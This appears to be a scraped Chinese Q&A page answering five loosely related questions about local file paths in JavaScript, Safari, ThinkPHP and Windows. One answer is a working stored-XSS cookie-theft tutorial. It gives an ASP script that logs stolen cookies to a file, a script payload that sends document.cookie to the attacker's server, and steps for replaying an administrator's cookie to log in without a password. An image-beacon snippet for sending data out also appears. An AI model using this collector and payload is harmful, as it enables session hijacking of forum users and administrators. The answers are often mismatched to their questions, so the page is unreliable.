目录介绍：

• 1、JS 多文件上传 怎么获得文件的本地路径
• 2、xss漏洞获取cookie怎么解决方案
• 3、苹果浏览器中怎样js 获取本地文件路径？
• 4、TP3.2.3怎么获取当前路径
• 5、怎么获取一个文件夹的路径，本地的路径

JS 多文件上传 怎么获得文件的本地路径

无法获取本地文件的绝对路径，这里涉及到一个浏览器安全问题。

input type="file" onchang="javascript:changeFile();" /

// 选择文件

function changeFile () {

    var e = this;

    // 修正IE8下，文件上传异常

    var files = e.files;

    if (files == undefined) {

        return false;

    }

    // 取得选择文件相关数据信息

    var file = files[0], fileName = file.name, fileSize = file.size;

    // 获取文件后缀名

    var fileType = fileName.substr(fileName.lastIndexOf(".")).toLowerCase();

}

xss漏洞获取cookie怎么解决方案

XSS获取cookie并利用

获取cookie利用代码cookie.asp

html

titlexx/title

body

%testfile = Server.MapPath('code.txt') //先构造一个路径，也就是取网站根目录，创造一个在根目录下的code.txt路径，保存在testfile中

msg = Request('msg') //获取提交过来的msg变量，也就是cookie值

set fs = server.CreateObject('scripting.filesystemobject')//创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(''msg'')//像code.txt中写入获取来的cookie

thisfile.close() //关闭

set fs = nothing%

/body

/html

把上述文件保存为cookie.asp文件，放到你自己的网站服务器下。比如这里我们自己搭建的服务器为：。

XSS构造语句

scriptwindow.open(''+document.cookie)/script

把上述语句放到你找到的存在XSS的目标中，不过这里最好是存储型xss，比如你找到了某个博客或者论坛什么的存在存储型XSS，你在里面发一篇帖子或者留上你的评论，内容就是上述语句，当其他用户或者管理员打开这个评论或者帖子链接后，就会触发，然后跳转到的页面，然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

简单步骤如下：

1、在存在漏洞的论坛中发日志：

X

2、然后以管理远登陆，进入后页面会跳转，此时cookie就发送到你的服务器下的code.txt文件中了：

3、这是没有账户前的登陆界面：

4、打开firefox的Tamper Data插件，点击Start Tamper开始抓取信息，刷新登陆界面，然后会跳出对话框，点击Tamper按钮，在途中的cookie一栏中替换掉你抓取到的cookie，单击确定发送请求数据：

5、替换cookie后不用输用户名密码就顺利进入管理员账户了：

苹果浏览器中怎样js 获取本地文件路径？

方法1：在下载链接上右键，选择“下载链接文件为...”，然后在出现的对话框里选择要存储的位置。

方法2：在safari的“偏好预置”-“通用”-“将下载的文件存储到...”里更改默认存储路径。

TP3.2.3怎么获取当前路径

通过图片传值就好了

var img = new Image();

img.src = "example.action?data=" + encodeURIComponent(data);

然后在example.action中用get获取到数据

这样不会在页面上生成图片，也不会发生跳转（弱弱说句，这也是XSS攻击的一种途径）

当然也可以用ajax提交，原生的比较麻烦，可以考虑借用jquery ajax

怎么获取一个文件夹的路径，本地的路径

1、右键点击该文件夹，选择“属性”；

2、在“常规”选项卡下，"位置"显示的就是该文件夹的本地路径。